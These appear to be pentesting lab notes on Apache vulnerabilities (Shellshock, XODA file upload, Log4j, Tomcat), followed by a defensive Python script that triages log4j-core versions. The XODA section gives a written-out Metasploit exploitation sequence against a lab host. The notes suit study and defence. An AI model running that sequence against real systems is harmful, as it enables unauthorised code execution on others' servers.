APACHE

  1. Apache Shellshock (Bash)

GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka ShellShock.

  • Affects the Bash shell since v.1.3

  • Bash mistakenly executes trailing commands after a series of characters

  • Apache web servers that run CGI or .sh scripts are also vulnerable

On Apache, the exposure is through .cgi scripts, which can be manipulated and taken advantage of.

Apache Shellshock (Bash) Metasploit Exploitation

  2. XODA file upload

80/tcp   open http Apache httpd 2.4.7 ((Ubuntu))
curl http://192.170.151.3
search xoda
use exploit/unix/webapp/xoda_file_upload
info
# Description:
#   This module exploits a file upload vulnerability found in XODA 
#   0.4.5. Attackers can abuse the "upload" command in order to upload a 
#   malicious PHP file without any authentication, which results in 
#   arbitrary code execution. The module has been tested successfully on 
#   XODA 0.4.5 and Ubuntu 10.04.
set TARGETURI /
run
Apache httpd 2.4.7-XODA Vulnerability
  1. Log4J

    Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

  2. Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution (2)

Apache Tomcat
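
For the Log4j item above, an inventory check is usually the first defensive step. The following is an added example, not code from the original page or from the Log4j project: it classifies log4j-core jar names against the version boundaries quoted in that item. The function names, status labels and jar paths are assumptions made for illustration, as is the treatment of later patch releases on the 2.12 and 2.3 branches.

```python
import re

# Version boundaries come from the Log4j item above; jar names are constructed samples.
FIRST_AFFECTED = (2, 0, 0, "beta", 9)        # 2.0-beta9
LOOKUP_OFF_BY_DEFAULT = (2, 15, 0)           # still in the affected range
LOOKUP_REMOVED_FROM = (2, 16, 0, None, 0)
# Security releases on older branches: branch -> first fixed patch level.
# Assumption (not on the page): later patch releases on these branches keep the fix.
FIXED_BRANCHES = {(2, 12): 2, (2, 3): 1}

_JAR_RE = re.compile(
    r"log4j-core-(\d+)\.(\d+)(?:\.(\d+))?(?:-(alpha|beta|rc)(\d+))?\.jar$", re.I)
_PRE_ORDER = {"alpha": 0, "beta": 1, "rc": 2, None: 3}  # a final release sorts last


def parse_jar(path):
    """Return (major, minor, patch, pre_tag, pre_num), or None if not log4j-core."""
    m = _JAR_RE.search(path)
    if not m:
        return None  # log4j-api, log4net, log4cxx etc. are out of scope
    major, minor, patch, tag, num = m.groups()
    return (int(major), int(minor), int(patch or 0),
            tag.lower() if tag else None, int(num or 0))


def _key(v):
    """Sortable key so that 2.0-beta8 < 2.0-beta9 < 2.0 (final)."""
    return (v[0], v[1], v[2], _PRE_ORDER[v[3]], v[4])


def classify(path):
    v = parse_jar(path)
    if v is None:
        return "not-log4j-core"
    if _key(v) < _key(FIRST_AFFECTED):
        return "outside-range"
    if _key(v) >= _key(LOOKUP_REMOVED_FROM):
        return "lookup-removed"
    fixed_patch = FIXED_BRANCHES.get(v[:2])
    if fixed_patch is not None and v[3] is None and v[2] >= fixed_patch:
        return "lookup-removed"
    if v[:3] == LOOKUP_OFF_BY_DEFAULT and v[3] is None:
        return "affected-lookup-off-by-default"
    return "affected"


def triage(paths):
    """Map each log4j-core path to its status; other artifacts are dropped."""
    return {p: s for p in paths if (s := classify(p)) != "not-log4j-core"}
```

Feed `triage` the jar paths found on a host or inside an unpacked archive; anything reported as `affected` or `affected-lookup-off-by-default` is a candidate for upgrade.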
